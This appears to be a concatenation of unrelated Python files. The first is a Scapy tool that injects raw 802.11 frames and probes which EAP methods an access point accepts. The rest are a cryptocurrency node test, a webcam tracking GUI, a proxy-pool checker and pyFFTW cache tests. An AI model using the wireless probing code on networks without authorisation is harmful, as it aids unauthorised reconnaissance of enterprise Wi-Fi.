Dot11 communications using Scapy.
Remember:
States Are For Smashing
"""
def __init__(self, interface, bssid, source_mac=None, dest_mac=None):
"""
You must specify a BSSID and a Local MAC address because the
entire point of this code is to facilitate stateful connections.
"""
if not source_mac:
source_mac = getHwAddr(interface)
if not dest_mac:
dest_mac = bssid
self.interface = interface
self.bssid = bssid.lower()
self.source_mac = source_mac.lower()
self.dest_mac = dest_mac.lower()
self.connected = False # connected / associated
self.__shutdown__ = False
self.sequence = randint(1200, 2000)
self.lastpacket = None
self.timeout = RESPONSE_TIMEOUT
def __del__(self):
self.shutdown()
self.close()
def __fixSC__(self, fragment=0):
"""
This is a reserved method to return the sequence number in a way
that is not skewed by a bug in how the SC field is packed in
Scapy.
"""
SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4)
return unpack('<H', pack('>H', SC))[0]
def __stopfilter__(self, packet):
"""
This is the stop filter for Scapy to be used to check if the
packet was sent to this WirelessStateMachine instance.
"""
if get_destination(packet) == self.source_mac and get_bssid(packet) == self.bssid: # and real_source == self.dest_mac:
self.lastpacket = packet
return True
self.lastpacket = None
return False
def __thread_sniff__(self):
"""
Sniff function threaded to start before packets are sent
"""
sniff(iface=self.interface, stop_filter=self.__stopfilter__, timeout=RESPONSE_TIMEOUT)
def __thread_sendp__(self, payload):
"""
Sendp function used for opening thread, sending packets, and closing thread
"""
quick_sniff = threading.Thread(target=self.__thread_sniff__)
quick_sniff.start()
time.sleep(0.1)
sendp(payload, iface=self.interface, verbose=False)
quick_sniff.join()
def connect(self, essid, rsnInfo=''):
"""
Connect/Associate with an access point.
errDict = {
-1:"Already Connected",
0:"No Error",
1:"Failed To Get Probe Response",
2:"Failed To Get Authentication Response",
3:"Failed To Get Association Response",
4:"Authentication Request Received Fail Response",
5:"Association Request Received Fail Response"
}
"""
# Dot11 Probe Request (to get authentication information if applicable)
payload = (
RadioTap()/
Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.dest_mac)/
Dot11Auth(seqnum=1)
)
self.__thread_sendp__(payload)
if rsnInfo is None: # None explicitly means go get it, leave it '' to proceed with out it
rsnInfo = self.get_rsn_information(essid)
if self.lastpacket is None or not self.lastpacket.haslayer(Dot11Auth):
return 2
if self.lastpacket.getlayer(Dot11Auth).status != 0:
return 4
#Dot11 Association Request
payload = (
RadioTap()/
Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=0)/
Dot11AssoReq(cap='ESS+short-preamble+short-slot', listen_interval=10)/
Dot11Elt(ID=0, info=essid)/
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')/
Dot11Elt(ID=50, info='\x0c\x12\x18\x60')/
rsnInfo
)
self.__thread_sendp__(payload)
if self.lastpacket is None or not self.lastpacket.haslayer(Dot11AssoResp):
return 3
if self.lastpacket.getlayer(Dot11AssoResp).status != 0:
return 5
self.connected = True
self.sequence = 0
return 0
def close(self):
"""
Disassociate from the access point, This does not veify that
the AP received the message and should be considred a
best-effort attempt.
errDict = {
-1:"Not Connected",
0:"No Error"
}
"""
if not self.connected:
return -1
sendp(
RadioTap()/
Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12)/
Dot11Disas(reason=3),
iface=self.interface,
verbose=False
)
sendp(
RadioTap()/
Dot11(addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=0, subtype=12)/
Dot11Disas(reason=3),
iface=self.interface,
verbose=False
)
self.connected = False
return 0
def get_rsn_information(self, essid):
rsnInfo = None
sendp(
RadioTap()/
Dot11(addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), subtype=4)/
Dot11ProbeReq()/
Dot11Elt(ID=0, info=essid)/
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c')/
Dot11Elt(ID=50, info='\x0c\x12\x18\x60'),
iface=self.interface,
verbose=False
)
self.sequence += 1
sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__)
if self.lastpacket is None or not self.lastpacket.haslayer(Dot11ProbeResp):
return None
probeResp = self.lastpacket.getlayer(Dot11ProbeResp)
tmp = probeResp.getlayer(Dot11Elt)
while tmp:
if tmp.fields.get('ID') == 48:
rsnInfo = tmp
break
else:
tmp = tmp.payload
if rsnInfo is None:
rsnInfo = '' # Did not find rsnInfo in probe response.
else:
rsnInfo = build_rsn_data(parse_rsn_data(rsnInfo.info))
rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo
return rsnInfo
def recv(self, bufferlen=0):
"""
Read a frame and return the information above the Dot11 layer.
"""
sniff(iface=self.interface, store=0, timeout=self.timeout, stop_filter=self.__stopfilter__)
if self.lastpacket:
return self.lastpacket
else:
return None
def send(self, data, dot11_type=2, dot11_subtype=8, FCfield=0x02, raw=True):
"""
Send a frame, if raw, insert the data above the Dot11QoS layer.
"""
frame = RadioTap()/Dot11(FCfield=FCfield, addr1=self.dest_mac, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=dot11_type, subtype=dot11_subtype)
if raw:
frame = frame/data
else:
frame = frame/Dot11QoS()/data
sendp(frame, iface=self.interface, verbose=False)
self.sequence += 1
def shutdown(self):
"""
Shutdown and disassociate from the AP.
"""
if self.connected:
self.close()
self.__shutdown__ = True
class WirelessStateMachineEAP(WirelessStateMachine):
"""
This is to keep the EAP functionality seperate so the core State-
Machine can be repurposed for other projects.
"""
def check_eap_type(self, essid, eaptype, outer_identity='user', eapol_start=False, rsnInfo=''):
"""
Check that an eaptype is supported.
errDict = {
0:"supported",
1:"not supported",
2:"could not determine",
3:"identity rejected"
}
"""
eapid = randint(1, 254)
if eapol_start:
eapol_start_request = (
RadioTap()/
Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8)/
Dot11QoS()/
LLC(dsap=170, ssap=170, ctrl=3)/
SNAP(code=0x888e)/
EAPOL(version=1, type=1)
)
self.sequence += 1
i = 0
for i in range(0, EAP_MAX_TRIES):
self.__thread_sendp__(eapol_start_request)
if not self.lastpacket is None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer('EAP').fields
if 'type' in fields and fields['type'] == 1 and fields['code'] == 1:
i = 0
eapid = fields['id']
break
if i == 2:
return 2
eap_identity_response = (
RadioTap()/
Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8)/
Dot11QoS()/
LLC(dsap=170, ssap=170, ctrl=3)/
SNAP(code=0x888e)/
EAPOL(version=1, type=0)/
EAP(code=2, type=1, id=eapid, identity=outer_identity)
)
eap_legacy_nak = (
RadioTap()/
Dot11(FCfield=0x01, addr1=self.bssid, addr2=self.source_mac, addr3=self.bssid, SC=self.__fixSC__(), type=2, subtype=8)/
Dot11QoS()/
LLC(dsap=170, ssap=170, ctrl=3)/
SNAP(code=0x888e)/
EAPOL(version=1, type=0, len=6)/
EAP(code=2, type=3, id=eapid + 1, eap_types=[eaptype])
)
self.sequence += 1
for i in range(0, EAP_MAX_TRIES):
self.__thread_sendp__(eap_identity_response)
if not self.lastpacket is None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer('EAP').fields
if fields['code'] == 4: # 4 is a failure
return 3
if 'type' in fields and fields['type'] == eaptype:
return 0
i = 0
break
if i == 2:
return 2
for i in range(0, EAP_MAX_TRIES):
self.__thread_sendp__(eap_legacy_nak)
if not self.lastpacket is None:
if self.lastpacket.haslayer('EAP'):
fields = self.lastpacket.getlayer('EAP').fields
if 'type' in fields and fields['type'] == eaptype:
return 0
else:
return 1
return 2
|
feature_shutdown.py | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Zenacoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test zenacoind shutdown."""
from test_framework.test_framework import ZenacoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(ZenacoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
examplegui.py | #!/usr/bin/env python
#Note check this out: http://johnroach.info/2011/03/02/image-capturing-from-webcam-using-opencv-and-pygame-in-python/
from __future__ import print_function
import pygtk, math, array, numpy as np
pygtk.require('2.0')
import gtk, gobject, cv, cairo, opencv, multiprocessing, time, Queue
from PIL import Image
import klt, selectGoodFeatures, writeFeatures, trackFeatures
def IplToPilImg(imIpl):
assert imIpl.nChannels == 3
imgSize = cv.GetSize(imIpl)
return Image.fromstring("RGB", cv.GetSize(imIpl), imIpl.tostring(), 'raw', "BGR")
class WebcamWidget(gtk.Invisible):
def __init__(self):
gtk.Invisible.__init__(self)
self.toWorker, self.fromWorker = multiprocessing.Queue(), multiprocessing.Queue()
self.buffer = []
self.maxBufferSize = 100
self.count = 0
gobject.timeout_add(int(round(1000./50.)), self.UpdatePipe)
self.p = multiprocessing.Process(target=self.PollCamera, args=(self.toWorker,self.fromWorker))
self.p.start()
def __del__(self):
pass
#self.Stop()
def Stop(self):
self.toWorker.put(("STOP",))
self.p.terminate()
def GetCurrentImg(self):
if len(self.buffer) == 0:
return None
return self.buffer[-1]
def GetFrameNum(self):
return self.count
def UpdatePipe(self):
while not self.fromWorker.empty():
try:
pipeData = self.fromWorker.get(0)
ty = pipeData[0]
if ty == "FRAME":
img = pipeData[1]
self.buffer.append(img)
self.count += 1
while len(self.buffer) > self.maxBufferSize:
self.buffer.pop(0)
#print(ty, len(self.buffer))
except Queue.Empty:
pass
return True
def PollCamera(self, toWorker, fromWorker):
running = True
cap = cv.CaptureFromCAM(-1)
capture_size = (320,200)
cv.SetCaptureProperty(cap, cv.CV_CAP_PROP_FRAME_WIDTH, capture_size[0])
cv.SetCaptureProperty(cap, cv.CV_CAP_PROP_FRAME_HEIGHT, capture_size[1])
#fps = cv.GetCaptureProperty(cap, cv.CV_CAP_PROP_FPS)
while (running):
try:
pipeData = toWorker.get(0)
#print("Worker",pipeData[0])
if pipeData[0] == "STOP":
running = False
except Queue.Empty:
pass
imIpl = cv.QueryFrame(cap)
if imIpl is not None:
pilImg = IplToPilImg(imIpl)
# #print(pilImg)
fromWorker.put(("FRAME",np.array(pilImg)))
time.sleep(1./100.)
fromWorker.put(("STOPPED",))
return True
class TrackingProcess:
def __init__(self):
self.currentTracking = []
self.toWorker, self.fromWorker = multiprocessing.Queue(), multiprocessing.Queue()
gobject.timeout_add(int(round(1000./50.)), self.UpdatePipe)
self.p = multiprocessing.Process(target=self.Process, args=(self.toWorker,self.fromWorker))
#self.p = multiprocessing.Process(target=Test, args=(pipeChile,))
self.p.start()
def __del__(self):
pass
def Stop(self):
self.toWorker.put(("STOP",))
self.p.terminate()
def TrackFrame(self, frameArr):
if self.toWorker.qsize() < 5:
self.toWorker.put(("FRAME", frameArr))
def GetCurrentTracking(self):
return self.currentTracking
def UpdatePipe(self):
try:
pipeData = self.fromWorker.get(0)
ty = pipeData[0]
if ty == "TRACKING":
tr = pipeData[1]
self.currentTracking = tr
except Queue.Empty:
pass
return True
def Process(self, toWorker,fromWorker):
running = True
currentFrame = None
tc = klt.KLT_TrackingContext()
tc.sequentialMode = True
tc.retainTrackers = True
fl = []
prevImg = None
while running:
while not toWorker.empty():
print(toWorker.empty(), toWorker.qsize())
try:
pipeData = toWorker.get()
if pipeData[0] == "STOP":
running = False
if pipeData[0] == "FRAME":
currentFrame = Image.fromarray(pipeData[1])
except Queue.Empty:
pass
time.sleep(0.01)
if currentFrame is not None and running:
nFeatures = 50
countActive = klt.KLTCountRemainingFeatures(fl)
if countActive == 0 or prevImg is None:
fl = selectGoodFeatures.KLTSelectGoodFeatures(tc, currentFrame, nFeatures)
else:
trackFeatures.KLTTrackFeatures(tc, prevImg, currentFrame, fl)
fromWorker.put(("TRACKING",fl))
prevImg = currentFrame
currentFrame = None
time.sleep(0.01)
class VisualiseWidget(gtk.DrawingArea):
def __init__(self):
gtk.DrawingArea.__init__(self)
self.image = None
self.trackerPos = []
self.set_size_request(100,100)
self.connect("expose_event", self.expose)
def expose(self, widget, event):
self.context = widget.window.cairo_create()
# set a clip region for the expose event
self.context.rectangle(event.area.x, event.area.y,
event.area.width, event.area.height)
self.context.clip()
self.draw(self.context)
return False
def RedrawCanvas(self):
self.redrawPending = False
if self.window:
alloc = self.get_allocation()
self.queue_draw_area(0, 0, alloc.width, alloc.height)
self.window.process_updates(True)
def draw(self, context):
rect = self.get_allocation()
x = rect.x + rect.width / 2
y = rect.y + rect.height / 2
if self.image is not None:
context.set_source_surface(self.image,
0.,
0.)
context.paint()
#Draw tracker points
context.save()
context.set_source_rgb(0, 1, 0)
for pt in self.trackerPos:
context.arc(pt[0], pt[1], 2., 0. * math.pi, 2. * math.pi)
context.fill()
context.restore()
def SetImageByIpl(self,imIpl):
#Convert IPL image to PIL image
#pilImg = opencv.adaptors.Ipl2PIL(imIpl)
self.SetImageByPil(IplToPilImg(imIpl))
def SetImageByPil(self, pilImg):
#Convert PIL image to cairo surface
pilRaw = array.array('B',pilImg.tostring("raw","BGRX",0,1))
stride = pilImg.size[0] * 4
self.image = cairo.ImageSurface.create_for_data(pilRaw, cairo.FORMAT_RGB24,
pilImg.size[0], pilImg.size[1], stride)
self.set_size_request(*pilImg.size)
class Base:
def __init__(self):
self.tc = klt.KLT_TrackingContext()
self.fl = []
self.webcam = WebcamWidget()
self.showingFrame = None
self.trackingProcess = TrackingProcess()
#Create main window
self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window.connect("delete_event", self.delete_event)
self.window.connect("destroy", self.destroy)
self.window.set_border_width(10)
self.visArea = VisualiseWidget()
#self.visArea.set_size_request((100,100))
#self.visArea.set_from_file("img0.pgm")
self.window.add(self.visArea)
self.window.show_all()
gobject.timeout_add(int(round(1000./25.)), self.UpdateImage)
def delete_event(self, widget, event, data=None):
self.webcam.Stop()
self.trackingProcess.Stop()
print("delete event occurred")
return False
def destroy(self, widget, data=None):
print("destroy window")
gtk.main_quit()
def main(self):
gtk.main()
def UpdateImage(self):
#print("x")
#cv.GrabFrame(self.cap)
#imIpl = cv.RetrieveFrame(self.cap)
if self.showingFrame != self.webcam.GetFrameNum():
img = self.webcam.GetCurrentImg()
if img is not None:
self.visArea.SetImageByPil(Image.fromarray(img))
currentTracking = self.trackingProcess.GetCurrentTracking()
#print(currentTracking)
self.visArea.trackerPos = []
for pt in currentTracking:
if pt.val < 0: continue
self.visArea.trackerPos.append((pt.x,pt.y))
self.visArea.RedrawCanvas()
self.trackingProcess.TrackFrame(img)
self.showingFrame = self.webcam.GetFrameNum()
return True
if __name__ == "__main__":
base = Base()
base.main()
|
schedule.py | import time
import json
from multiprocessing import Process
import asyncio
import aiohttp
try:
from aiohttp.errors import ProxyConnectionError
except:
from aiohttp import ClientProxyConnectionError as ProxyConnectionError
from proxypool.db import RedisClient
from proxypool.error import ResourceDepletionError
from proxypool.getter import FreeProxyGetter
from proxypool.setting import *
from asyncio import TimeoutError
class ValidityTester(object):
test_api = TEST_API
def __init__(self):
self._raw_proxies = None
self._usable_proxies = []
def set_raw_proxies(self, proxies):
self._raw_proxies = proxies
self._conn = RedisClient()
async def test_single_proxy(self, proxy):
"""
text one proxy, if valid, put them to usable_proxies.
"""
async with aiohttp.ClientSession() as session:
try:
if isinstance(proxy, bytes):
proxy = proxy.decode('utf-8')
real_proxy = 'http://' + proxy
# print('Testing', proxy)
async with session.get(self.test_api, proxy=real_proxy, timeout=15) as response:
if response.status == 200:
# rr = await response.read()
self._conn.put(proxy)
# httpbin_ip = eval(rr.decode('utf-8'))['origin']
# print('原:',httpbin_ip)
# if len(httpbin_ip.split(','))==1:
# self._conn.put(proxy)
# print('高匿:', proxy)
# else:
# self._conn.put(proxy)
# print('透明:', proxy)
print('*'*19)
except (ProxyConnectionError, TimeoutError, ValueError):
pass
# print('Invalid proxy', proxy)
def test(self):
"""
aio test all proxies.
"""
print('ValidityTester is working')
try:
loop = asyncio.get_event_loop()
tasks = [self.test_single_proxy(proxy) for proxy in self._raw_proxies]
loop.run_until_complete(asyncio.wait(tasks))
except ValueError:
print('Async Error')
class PoolAdder(object):
"""
add proxy to pool
"""
def __init__(self, threshold):
self._threshold = threshold
self._conn = RedisClient()
self._tester = ValidityTester()
self._crawler = FreeProxyGetter()
def is_over_threshold(self):
"""
judge if count is overflow.
"""
if self._conn.queue_len >= self._threshold:
return True
else:
return False
def add_to_queue(self):
print('PoolAdder is working')
proxy_count = 0
while not self.is_over_threshold():
for callback_label in range(self._crawler.__CrawlFuncCount__):
callback = self._crawler.__CrawlFunc__[callback_label]
raw_proxies = self._crawler.get_raw_proxies(callback)
# test crawled proxies
self._tester.set_raw_proxies(raw_proxies)
self._tester.test()
proxy_count += len(raw_proxies)
if self.is_over_threshold():
print('IP is enough, waiting to be used')
break
if proxy_count == 0:
raise ResourceDepletionError
class Schedule(object):
@staticmethod
def valid_proxy(cycle=VALID_CHECK_CYCLE):
"""
Get half of proxies which in redis
"""
conn = RedisClient()
tester = ValidityTester()
while True:
print('Refreshing ip')
count = int(0.5 * conn.queue_len)
if count == 0:
print('Waiting for adding')
time.sleep(cycle)
continue
raw_proxies = conn.get(count)
tester.set_raw_proxies(raw_proxies)
tester.test()
time.sleep(cycle)
@staticmethod
def check_pool(lower_threshold=POOL_LOWER_THRESHOLD,
upper_threshold=POOL_UPPER_THRESHOLD,
cycle=POOL_LEN_CHECK_CYCLE):
"""
If the number of proxies less than lower_threshold, add proxy
"""
conn = RedisClient()
adder = PoolAdder(upper_threshold)
while True:
if conn.queue_len < lower_threshold:
adder.add_to_queue()
time.sleep(cycle)
def run(self):
print('Ip processing running')
valid_process = Process(target=Schedule.valid_proxy)
check_process = Process(target=Schedule.check_pool)
valid_process.start()
check_process.start()
|
test_pyfftw_interfaces_cache.py | #
# Copyright 2017 Knowledge Economy Developments Ltd
#
# Henry Gomersall
# heng@kedevelopments.co.uk
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import copy
from pyfftw import interfaces, builders
import pyfftw
import numpy
import numpy as np
import unittest
from .test_pyfftw_base import run_test_suites, miss
from .test_pyfftw_numpy_interface import InterfacesNumpyFFTTestFFT
import threading
import time
import os
import hashlib
'''Test the caching functionality of the interfaces package.
'''
def _check_n_cache_threads_running():
'''Return how many threads have the name 'PyFFTWCacheThread.
Obviously, this isn't production quality, but it should suffice for
the tests here.
'''
cache_threads = 0
for each_thread in threading.enumerate():
if each_thread.name == 'PyFFTWCacheThread':
cache_threads += 1
return cache_threads
@unittest.skipIf(*miss('64'))
class InterfacesNumpyFFTCacheTestFFT(InterfacesNumpyFFTTestFFT):
test_shapes = (
((100,), {}),
((128, 64), {'axis': 0}),
((128, 32), {'axis': -1}),
((32, 64), {}),
)
def validate(self, array_type, test_shape, dtype,
s, kwargs, copy_func=copy.copy):
# Do it with the cache
interfaces.cache.enable()
output = self._validate(array_type, test_shape, dtype, s, kwargs,
copy_func=copy_func)
output2 = self._validate(array_type, test_shape, dtype, s, kwargs,
copy_func=copy_func)
self.assertIsNot(output, output2)
# Turn it off to finish
interfaces.cache.disable()
@unittest.skipIf(*miss('64'))
class CacheSpecificInterfacesUtils(unittest.TestCase):
def test_slow_lookup_no_race_condition(self):
'''Checks that lookups in _utils longer than the keepalive time are ok.
'''
# Any old size, it doesn't matter
data_shape = (128,)
# Monkey patch the module with a custom _Cache object
_Cache_class = interfaces.cache._Cache
class _SlowLookupCache(_Cache_class):
def _lookup(self, key):
return _Cache_class.lookup(self, key)
def lookup(self, key):
time.sleep(0.1)
return self._lookup(key)
try:
interfaces.cache._Cache = _SlowLookupCache
interfaces.cache.enable()
# something shortish
interfaces.cache.set_keepalive_time(0.001)
ar, ai = numpy.random.randn(*(2,) + data_shape)
a = ar + 1j*ai
# Both the following should work without exception
# (even if it fails to get from the cache)
interfaces.numpy_fft.fft(a)
interfaces.numpy_fft.fft(a)
interfaces.cache.disable()
finally:
# Revert the monkey patching
interfaces.cache._Cache = _Cache_class
class InterfacesCacheTest(unittest.TestCase):
def test_missing_threading(self):
self.assertIs(interfaces.cache._fftw_cache, None)
mod_threading = interfaces.cache._threading
interfaces.cache._threading = None
with self.assertRaises(ImportError):
interfaces.cache.enable()
interfaces.cache._threading = mod_threading
def test_is_enabled(self):
self.assertIs(interfaces.cache._fftw_cache, None)
interfaces.cache.enable()
self.assertTrue(interfaces.cache.is_enabled())
interfaces.cache.disable()
self.assertFalse(interfaces.cache.is_enabled())
def test_cache_enable_disable(self):
self.assertIs(interfaces.cache._fftw_cache, None)
interfaces.cache.enable()
self.assertIsInstance(
interfaces.cache._fftw_cache, interfaces.cache._Cache)
interfaces.cache.disable()
self.assertIs(interfaces.cache._fftw_cache, None)
def test_set_keepalive_time(self):
with self.assertRaises(interfaces.cache.CacheError):
interfaces.cache.set_keepalive_time(10)
interfaces.cache.enable()
interfaces.cache.set_keepalive_time(10)
self.assertTrue(
interfaces.cache._fftw_cache.keepalive_time == 10.0)
interfaces.cache.disable()
class CacheTest(unittest.TestCase):
def test_cache_parent_thread_ended(self):
'''Test ending cache parent thread ends cache thread.
'''
# Firstly make sure we've exited any lingering threads from other
# tests.
time.sleep(0.1)
self.assertTrue(_check_n_cache_threads_running() == 0)
def cache_parent_thread():
cache = interfaces.cache._Cache()
time.sleep(0.5)
# We give the parent thread the same name as a Cache thread so
# it is picked up by the cache_threads_running function
parent_t = threading.Thread(
target=cache_parent_thread, name='PyFFTWCacheThread')
parent_t.start()
time.sleep(0.1)
# Check it's running
self.assertTrue(_check_n_cache_threads_running() == 2)
parent_t.join()
time.sleep(0.1)
# Check both threads have exited properly
self.assertTrue(_check_n_cache_threads_running() == 0)
def test_delete_cache_object(self):
'''Test deleting a cache object ends cache thread.
'''
# Firstly make sure we've exited any lingering threads from other
# tests.
time.sleep(0.2)
self.assertTrue(_check_n_cache_threads_running() == 0)
_cache = interfaces.cache._Cache()
time.sleep(0.2)
self.assertTrue(_check_n_cache_threads_running() == 1)
del _cache
time.sleep(0.2)
self.assertTrue(_check_n_cache_threads_running() == 0)
@unittest.skipIf(*miss('64'))
def test_insert_and_lookup_item(self):
_cache = interfaces.cache._Cache()
key = 'the key'
test_array = numpy.random.randn(16)
obj = builders.fft(test_array)
_cache.insert(obj, key)
self.assertIs(_cache.lookup(key), obj)
@unittest.skipIf(*miss('64'))
def test_invalid_lookup(self):
_cache = interfaces.cache._Cache()
key = 'the key'
test_array = numpy.random.randn(16)
obj = builders.fft(test_array)
_cache.insert(obj, key)
self.assertRaises(KeyError, _cache.lookup, 'wrong_key')
def test_keepalive_time_update(self):
_cache = interfaces.cache._Cache()
# The default
self.assertEqual(_cache.keepalive_time, 0.1)
_cache.set_keepalive_time(0.3)
self.assertEqual(_cache.keepalive_time, 0.3)
_cache.set_keepalive_time(10.0)
self.assertEqual(_cache.keepalive_time, 10.0)
_cache.set_keepalive_time('0.2')
self.assertEqual(_cache.keepalive_time, 0.2)
with self.assertRaises(ValueError):
_cache.set_keepalive_time('foo')
with self.assertRaises(TypeError):
_cache.set_keepalive_time([])
@unittest.skipIf(*miss('64'))
def test_contains(self):
_cache = interfaces.cache._Cache()
key = 'the key'
test_array = numpy.random.randn(16)
obj = builders.fft(test_array)
_cache.insert(obj, key)
self.assertTrue(key in _cache)
self.assertFalse('Not a key' in _cache)
@unittest.skipIf(*miss('64'))
def test_objects_removed_after_keepalive(self):
_cache = interfaces.cache._Cache()
key = 'the key'
test_array = numpy.random.randn(16)
obj = builders.fft(test_array)
_cache.insert(obj, key)
self.assertIs(_cache.lookup(key), obj)
keepalive_time = _cache.keepalive_time
if os.name == 'nt':
# A hack to keep appveyor from falling over here. I suspect the
# contention is too much to work properly. Either way, let's
# assume it's a windows problem for now...
time.sleep(keepalive_time * 8)
else:
# Relax a bit more otherwise
time.sleep(keepalive_time * 4)
self.assertRaises(KeyError, _cache.lookup, key)
_cache.insert(obj, key)
old_keepalive_time = _cache.keepalive_time
_cache.set_keepalive_time(old_keepalive_time * 4)
self.assertIs(_cache.lookup(key), obj)
time.sleep(old_keepalive_time * 3.5)
# still should be there
self.assertIs(_cache.lookup(key), obj)
if os.name == 'nt':
# As above, but with a bit longer
time.sleep(old_keepalive_time * 16)
else:
time.sleep(old_keepalive_time * 8)
self.assertRaises(KeyError, _cache.lookup, key)
def test_misaligned_data_doesnt_clobber_cache(self):
'''A bug was highlighted in #197 in which misaligned data causes
an overwrite of an FFTW internal array which is also the same as
an output array. The correct behaviour is for the cache to have
alignment as a key to stop this happening.
'''
interfaces.cache.enable()
N = 64
pyfftw.interfaces.cache.enable()
np.random.seed(12345)
Um = pyfftw.empty_aligned((N, N+1), dtype=np.float32, order='C')
Vm = pyfftw.empty_aligned((N, N+1), dtype=np.float32, order='C')
U = np.ndarray((N, N), dtype=Um.dtype, buffer=Um.data, offset=0)
V = np.ndarray(
(N, N), dtype=Vm.dtype, buffer=Vm.data, offset=Vm.itemsize)
U[:] = np.random.randn(N, N).astype(np.float32)
V[:] = np.random.randn(N, N).astype(np.float32)
uh = hashlib.md5(U).hexdigest()
vh = hashlib.md5(V).hexdigest()
x = interfaces.numpy_fft.rfftn(
U, None, axes=(0, 1), overwrite_input=False)
y = interfaces.numpy_fft.rfftn(
V, None, axes=(0, 1), overwrite_input=False)
self.assertTrue(uh == hashlib.md5(U).hexdigest())
self.assertTrue(vh == hashlib.md5(V).hexdigest())
interfaces.cache.disable()
class InterfacesNumpyFFTCacheTestIFFT(InterfacesNumpyFFTCacheTestFFT):
func = 'ifft'
class InterfacesNumpyFFTCacheTestRFFT(InterfacesNumpyFFTCacheTestFFT):
func = 'rfft'
class InterfacesNumpyFFTCacheTestIRFFT(InterfacesNumpyFFTCacheTestFFT):
func = 'irfft'
realinv = True
class InterfacesNumpyFFTCacheTestFFT2(InterfacesNumpyFFTCacheTestFFT):
axes_kw = 'axes'
func = 'ifft2'
test_shapes = (
((128, 64), {'axes': None}),
((128, 32), {'axes': None}),
((32, 64), {'axes': (-2, -1)}),
((4, 6, 8, 4), {'axes': (0, 3)}),
)
invalid_args = (
((100,), ((100, 200),), ValueError, 'Shape error'),
((100, 200), ((100, 200, 100),), ValueError, 'Shape error'),
((100,), ((100, 200), (-3, -2, -1)), ValueError, 'Shape error'),
((100, 200), (100, -1), TypeError, ''),
((100, 200), ((100, 200), (-3, -2)), IndexError, 'Invalid axes'),
((100, 200), ((100,), (-3,)), IndexError, 'Invalid axes'))
class InterfacesNumpyFFTCacheTestIFFT2(InterfacesNumpyFFTCacheTestFFT2):
func = 'ifft2'
class InterfacesNumpyFFTCacheTestRFFT2(InterfacesNumpyFFTCacheTestFFT2):
func = 'rfft2'
class InterfacesNumpyFFTCacheTestIRFFT2(InterfacesNumpyFFTCacheTestFFT2):
func = 'irfft2'
realinv = True
class InterfacesNumpyFFTCacheTestFFTN(InterfacesNumpyFFTCacheTestFFT2):
func = 'ifftn'
test_shapes = (
((128, 32, 4), {'axes': None}),
((64, 128, 16), {'axes': (0, 1, 2)}),
((4, 6, 8, 4), {'axes': (0, 3, 1)}),
((4, 6, 8, 4), {'axes': (0, 3, 1, 2)}),
)
class InterfacesNumpyFFTCacheTestIFFTN(InterfacesNumpyFFTCacheTestFFTN):
func = 'ifftn'
class InterfacesNumpyFFTCacheTestRFFTN(InterfacesNumpyFFTCacheTestFFTN):
func = 'rfftn'
